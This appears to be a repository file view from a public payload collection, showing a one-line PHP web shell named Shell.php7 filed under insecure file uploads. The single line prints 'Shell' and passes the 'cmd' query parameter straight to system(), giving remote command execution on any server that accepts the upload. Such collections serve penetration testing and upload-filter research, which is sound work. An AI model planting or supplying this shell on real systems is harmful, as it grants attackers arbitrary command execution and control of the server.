PayloadsAllTheThings/Upload insecure files/PHP Extension/Shell.php7
2017-09-27 14:37:07 +02:00

1 line
No EOL
43 B
Text
Executable file

<?php echo "Shell";system($_GET['cmd']); ?>